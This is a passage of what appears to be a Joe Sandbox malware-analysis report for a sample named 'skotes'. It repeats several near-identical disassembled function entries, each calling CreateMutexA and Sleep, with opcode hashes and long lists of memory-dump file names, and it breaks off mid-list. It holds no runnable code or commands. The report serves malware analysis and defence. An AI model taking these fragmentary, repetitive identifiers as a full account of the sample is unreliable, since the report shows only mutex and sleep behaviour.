Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 3b2116db31d54bd16b8dd3c3eae94179276f8e1f1e99b311ecf16e10b4a8fadb
Instruction ID: acdb7ee3ff5784e3454a3f28eddd71ad7523c982143cc8f22245178fda820343
Opcode Fuzzy Hash: 3b2116db31d54bd16b8dd3c3eae94179276f8e1f1e99b311ecf16e10b4a8fadb
Instruction Fuzzy Hash: 8A316A716442049BFB18BBBCDC8976DBB72EBC5310F24821DE114973D6D73EA9808761

Function 00789F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: df5d06f2155a679c52986e9b76c6e41bc74542844430bf457c6742f8329da858
Instruction ID: 695b71d61dddf2b909e4b552f7e2e9719cd09b5c2ce8e312e420c81f075d2677
Opcode Fuzzy Hash: df5d06f2155a679c52986e9b76c6e41bc74542844430bf457c6742f8329da858
Instruction Fuzzy Hash: C1312831644104ABFB18BBB8DC897ADB762EBC5310F24821AE154E72D1E73EA9848712

Function 0078A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 00ab959046e0395f8522ab972af2cbb574b97cb9468e4b5012257e3b1f8ad70c
Instruction ID: 96f22cf4307cdb85ad697ad79261378795f5bc52f6a06295a83543d2661f55bc
Opcode Fuzzy Hash: 00ab959046e0395f8522ab972af2cbb574b97cb9468e4b5012257e3b1f8ad70c
Instruction Fuzzy Hash: 48312931A54104ABFB18ABBCDC8D75DB772DB85314F24821AE014972D1E73EA9848712

Function 0078A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 802d955416e676679f0a55c22fcab2b110103c34189427ce110c4c10a3c5ba2b
Instruction ID: 7badf7d32cf9dc0e3065bd17ac941ecefa2092538bd2b7553f1096e6e530f8ca
Opcode Fuzzy Hash: 802d955416e676679f0a55c22fcab2b110103c34189427ce110c4c10a3c5ba2b
Instruction Fuzzy Hash: E9312831A44144ABFB18BBBCDC8DB6DB772EBC6310F24821EE054972D1D73EA9848712

Function 0078A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: ce7f0ac9939007c11a586097979a52c698aa745e5a313a364dcec4eaf57e6678
Instruction ID: 0e021f6d48a1aee757f79dc1516320e77507d30653585eaa93fd87bb23613119
Opcode Fuzzy Hash: ce7f0ac9939007c11a586097979a52c698aa745e5a313a364dcec4eaf57e6678
Instruction Fuzzy Hash: 1A311931A44140EBFF18BBBCD88D76DB671EBC5314F20821AE058972D6D77DA9848762

Function 0078A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 1d470fff3dddac913e868bf1a54acad5e90cee07a08161d67e9f2fd45169a2c1
Instruction ID: cd64cd9b10db70c8bf768c5897df3d55a4cda01e037ef39e93271aecdcdafd65
Opcode Fuzzy Hash: 1d470fff3dddac913e868bf1a54acad5e90cee07a08161d67e9f2fd45169a2c1
Instruction Fuzzy Hash: 52314A31644100ABFB18FBB8DC8DB6DB761EBC5314F24821AE054DB2D6D73DA9808722

Function 0078A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
